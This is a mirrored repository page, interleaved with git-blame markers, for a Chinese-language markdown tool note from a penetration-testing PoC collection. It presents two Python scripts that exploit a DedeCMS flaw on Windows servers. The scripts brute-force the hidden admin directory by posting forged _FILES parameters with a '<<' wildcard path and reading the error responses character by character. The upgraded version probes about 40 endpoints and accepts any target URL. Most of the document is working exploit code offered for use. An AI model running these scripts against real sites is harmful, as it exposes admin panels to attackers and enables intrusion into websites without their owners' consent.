admin/Penetration_Testing_POC
1
0
Fork 0
mirror of https://github.com/Mr-xn/Penetration_Testing_POC.git synced 2025-06-20 09:50:19 +00:00
Code Issues Packages Projects Releases Wiki Activity
Penetration_Testing_POC/tools/dede_burp_admin_path.md

233 lines
8.1 KiB
Markdown
Raw Normal View History

update
2019-07-24 20:58:20 +08:00
## dede_burp_admin_path dedecms后台路径爆破脚本前提网站环境为Windows环境
#### 说明
> 网上最早得脚本应该是由红日安全团队发布,但是他们得脚本只针对网站根目录下的`tags.php` 文件包括不全面如果删掉了这个文件就GG了现在这个版本是包括了所有可以爆破出后台路径的文件具体的可以看代码。
```python
#!/usr/bin/env python
Update dede_burp_admin_path.md
2019-07-28 13:48:48 +08:00
# 需要requests 模块,请自行使用 pip 安装
update
2019-07-24 20:58:20 +08:00
'''/*
* author = Mochazz
* team = 红日安全团队
* env = pyton3
*
*/
'''
import requests
import itertools
characters = "abcdefghijklmnopqrstuvwxyz0123456789_!#"
back_dir = ""
flag = 0
url = "http://192.168.1.9/tags.php"
data = {
"_FILES[mochazz][tmp_name]" : "./{p}<</images/adminico.gif",
"_FILES[mochazz][name]" : 0,
"_FILES[mochazz][size]" : 0,
"_FILES[mochazz][type]" : "image/gif"
}
for num in range(1,7):
if flag:
break
for pre in itertools.permutations(characters,num):
pre = ''.join(list(pre))
data["_FILES[mochazz][tmp_name]"] = data["_FILES[mochazz][tmp_name]"].format(p=pre)
print("testing",pre)
r = requests.post(url,data=data)
if "Upload filetype not allow !" not in r.text and r.status_code == 200:
flag = 1
back_dir = pre
data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif"
break
else:
data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif"
print("[+] 前缀为:",back_dir)
flag = 0
for i in range(30):
if flag:
break
for ch in characters:
if ch == characters[-1]:
flag = 1
break
data["_FILES[mochazz][tmp_name]"] = data["_FILES[mochazz][tmp_name]"].format(p=back_dir+ch)
r = requests.post(url, data=data)
if "Upload filetype not allow !" not in r.text and r.status_code == 200:
back_dir += ch
print("[+] ",back_dir)
data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif"
break
else:
data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif"
print("后台地址为:",back_dir)
```
升级版本代码如下:
```python
#!/usr/bin/env python3
Update dede_burp_admin_path.md
2019-07-28 13:48:48 +08:00
# 需要requests 模块,请自行使用 pip 安装
update
2019-07-24 20:58:20 +08:00
# coding:utf-8
Update dede_burp_admin_path.md
2019-07-28 13:48:48 +08:00
update
2019-07-24 20:58:20 +08:00
import requests
import itertools
from random import choice
import sys
characters = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_!#@-"
back_dir = ""
show_message = {}
check_message = {}
valid_file = []
data = {
"_FILES[tools][tmp_name]": "./../{p}<</images/adminico.gif",
"_FILES[tools][name]": 0,
"_FILES[tools][size]": 0,
"_FILES[tools][type]": "image/gif"
}
headers = {
"User-Agent":
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0",
"Accept":
"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
"Content-Type": "application/x-www-form-urlencoded",
"Connection": "Close"
}
class Bute_Login:
global headers
def __init__(self, target):
self.target = target
def Check(self):
global data, check_message, valid_file
File_Chek_List = [
'/tags.php', '/include/vdimgck.php', '/m/list.php', '/m/view.php',
'/member/config.php', '/plus/advancedsearch.php',
'/plus/arcmulti.php', '/plus/bookfeedback.php',
'/plus/bookfeedback_js.php', '/plus/car.php',
'/plus/carbuyaction.php', '/plus/comments_frame.php',
'/plus/count.php', '/plus/digg_ajax.php', '/plus/digg_frame.php',
'/plus/digg_frame.php', '/plus/disdls.php', '/plus/diy.php',
'/plus/download.php', '/plus/erraddsave.php', '/plus/feedback.php',
'/plus/feedback_ajax.php', '/plus/flink.php', '/plus/flink.php',
'/plus/flink_add.php', '/plus/freelist.php',
'/plus/heightsearch.php', '/plus/list.php', '/plus/mytag_js.php',
'/plus/posttocar.php', '/plus/qrcode.php', '/plus/recommend.php',
'/plus/rss.php', '/plus/search.php', '/plus/showphoto.php',
'/plus/stow.php', '/plus/view.php', '/plus/vote.php',
'/special/index.php'
]
for filename in File_Chek_List:
try:
res = requests.post(self.target + filename, data=data)
# print (self.target+filename+"--->"+res.text)
if "Upload filetype not allow !" in res.text and res.status_code == 200:
valid_file.append(filename)
except Exception:
pass
# print (valid_file)
# print (valid_file)
if len(valid_file):
if "/tags.php" in valid_file:
for i in valid_file:
if i == "/tags.php":
return i
else:
file_name = choice(valid_file)
return file_name
else:
return False
def Bute(self):
f_name = self.Check()
print(f_name)
if f_name is not False:
if f_name == "/tags.php":
prefix = "./"
else:
prefix = "./../"
flag = 0
global characters, back_dir, data, check_message
for num in range(1, 7):
if flag:
break
for pre in itertools.permutations(characters, num):
pre = ''.join(list(pre))
data["_FILES[tools][tmp_name]"] = data[
"_FILES[tools][tmp_name]"].format(p=pre)
print(("testing", pre))
r = requests.post(self.target + f_name, data=data)
if "Upload filetype not allow !" not in r.text and r.status_code == 200:
flag = 1
back_dir = pre
data[
"_FILES[tools][tmp_name]"] = "%s{p}<</images/adminico.gif" % prefix
break
else:
data[
"_FILES[tools][tmp_name]"] = "%s{p}<</images/adminico.gif" % prefix
print("[+] 前缀为:", back_dir)
flag = 0
for i in range(30):
if flag:
break
for ch in characters:
if ch == characters[-1]:
flag = 1
break
data["_FILES[tools][tmp_name]"] = data[
"_FILES[tools][tmp_name]"].format(p=back_dir + ch)
r = requests.post(self.target + f_name, data=data)
if "Upload filetype not allow !" not in r.text and r.status_code == 200:
back_dir += ch
print("[+] ", back_dir)
data[
"_FILES[tools][tmp_name]"] = "%s{p}<</images/adminico.gif" % prefix
break
else:
data[
"_FILES[tools][tmp_name]"] = "%s{p}<</images/adminico.gif" % prefix
show_message['Login_url'] = self.target + "/%s" % back_dir
print(show_message)
return show_message
else:
check_message['Enumerate'] = False
print(check_message)
return check_message
def main(url):
N = Bute_Login(url)
N.Bute()
'''
usage: python dede_login.py -u [url]http://dedecms.test/[/url]
output:
('testing', 'a')
('testing', 'b')
('testing', 'c')
{'Login_url': 'http://dedecms.test/dede'}
'''
if __name__ == '__main__':
if sys.argv[1] == "-u":
main(sys.argv[2])
```
## 使用效果如下
![dede_burp_admin_path](img/dede_burp_admin_path.gif)
### 相关文章
Update dede_burp_admin_path.md
2019-07-28 13:48:48 +08:00
https://xz.aliyun.com/t/2064
Reference in New Issue Copy Permalink